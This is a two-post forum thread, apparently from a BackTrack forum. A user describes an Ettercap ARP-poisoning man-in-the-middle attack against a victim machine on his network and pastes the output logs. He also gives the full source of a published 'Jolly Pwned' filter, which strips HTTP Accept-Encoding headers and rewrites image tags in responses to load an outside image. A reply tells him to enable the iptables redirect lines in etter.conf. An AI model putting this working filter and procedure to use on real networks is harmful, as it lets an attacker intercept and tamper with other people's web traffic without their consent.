Results 1 to 2 of 2

Thread: Ettercap Image Filter Problem! HELP!

  1. #1
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    1

    Thumbs up Ettercap Image Filter Problem! HELP!

    Okay, im sorry if this has been posted before... but ive searched all over the place and couldnt find the answer ANYWHERE!

    i am running Windows XP SP3, this is my attacking computer, and my victim is running the same.

    My Goal: I am using irongeeks tutorial on image filtering and i want to use his exact code to show the jollypwn symbol.

    My Problem: I compile the filter and it compiles perfectly fine, i then proceed to open ettercap, i select unified sniffing on my broadcom 802.11g network, after i am connected i sniff for hosts. I scan for all the hosts on my network perfectly fine. i set the victim as target 1 and target 2. Then i set up a MITM ARP Poison attack on the victim. it completes fine with the confirmation:

    Listening on \Device\NPF_{1D779372-ECC6-49EB-8005-4AF5BD58FC14}... (Ethernet)

    \Device\NPF_{1D779372-ECC6-49EB-8005-4AF5BD58FC14} -> 00:23:08:5E:55:6D 192.168.254.2 255.255.255.0

    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    26 plugins
    39 protocol dissectors
    53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    4 hosts added to the hosts list...
    Host 192.168.254.5 added to TARGET1
    Host 192.168.254.5 added to TARGET2

    ARP poisoning victims:

    GROUP 1 : 192.168.254.5 00:23:08:5E:97:50

    GROUP 2 : 192.168.254.5 00:23:08:5E:97:50

    then i select the jollypwn.ef filter, it completes fine with the confirmation:

    Content filters loaded from C:\Ettercap\jollypwn.ef...

    Then i begin to sniff, and everything seems like it is running perfectly fine, i get these confirmations:

    Starting Unified sniffing...

    Filter Ran.
    Filter Ran.
    Filter Ran.
    ~snip~
    Filter Ran.
    Filter Ran.
    Filter Ran.

    Now heres the main problem...

    when i start the sniffing, the host for ettercap should start filtering the images and swapping them for the jollypwn symbol... but instead... the victim acts as if i am filtering nothing, and the page source stays unchanged....

    yes i have cleared the dns cache and internet cache before testing it.

    this is the filter i used:


    ################################################## ##########################
    # #
    # Jolly Pwned -- ig.filter -- filter source file #
    # #
    # By Irongeek. based on code from ALoR & NaGA #
    # Along with some help from Kev and jon.dmml #
    # [***same url as the origional, blocked for forum purposes***]Ettercap :: View topic - HowTo do filters (Yahoo example)[/url] #
    # #
    # This program is free software; you can redistribute it and/or modify #
    # it under the terms of the GNU General Public License as published by #
    # the Free Software Foundation; either version 2 of the License, or #
    # (at your option) any later version. #
    # #
    ################################################## ##########################
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"***same url as the origional, blocked for forum purposes***" ");
    replace("IMG SRC=", "img src=\"***same url as the origional, blocked for forum purposes***" ");
    msg("Filter Ran.\n");
    }

    i know about the no spoon feeding rule but ive searched everywhere and nobody seems to relate to my problem... please help!

    thank you ahead of time!

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    /
    Posts
    16

    Default

    This forum is for backtrack not windows. Why don't you boot backtrack and edit your etter.conf file,

    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    to this

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •